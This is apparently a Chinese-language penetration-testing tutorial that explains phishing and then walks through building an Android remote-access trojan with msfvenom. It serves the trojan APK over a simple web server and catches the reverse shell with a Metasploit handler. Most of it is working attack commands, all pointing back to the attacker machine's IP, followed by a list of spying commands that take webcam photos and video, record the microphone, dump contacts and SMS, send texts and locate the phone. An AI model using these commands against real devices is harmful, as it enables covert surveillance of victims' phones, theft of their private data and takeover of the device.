网络钓鱼(Phishing,与钓鱼的英语fishing发音相近,又名钓鱼法或钓鱼式攻击)是通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾邮件,意图引诱收信人给出敏感信息(如用户名、口令、帐号 ID 、 ATM PIN 码或信用卡详细信息)的一种攻击方式。
这里我采用 URL 链接来作为演示。
使用kali自带的setoolkit
可以看到当你在右边输入内容搜索时,左边的监控会自动获取你的内容。
系统 |
IP |
作用 |
kali |
192.168.43.187 | 攻击机 |
华为 |
192.168.43.117 |
试验机 |
kali生成apk 木马
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.187 lport=6666 R > /root/test.apk -p 指定攻击类型 lhost kali ip lport 监听端口
手机获取木马
# kali 开启web页面 python -m SimpleHTTPServer 80
手机浏览器输入 ip
精彩的地方开始了
启动渗透框架
msfdb run use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 192.168.43.187 set lport 6666 exploit
# 手机可用命令 help 帮助命令 webcam_list 查看摄像头 webcam_snap 1/2 前后摄像头拍照 webcam_stream 1 录视频 record_mic 录音 check_root 检测root权限 dump_contacts 导出联系人 dump_sms 导出短信记录 send_sms -d xxxxxxxx -t "内容" 发送信息 geolocate 定位
虽然现在大部分安卓手机内核比较高,木马兼容性不是很高,但有人只要是想搞破坏,他会利用其他工具对木马进行加强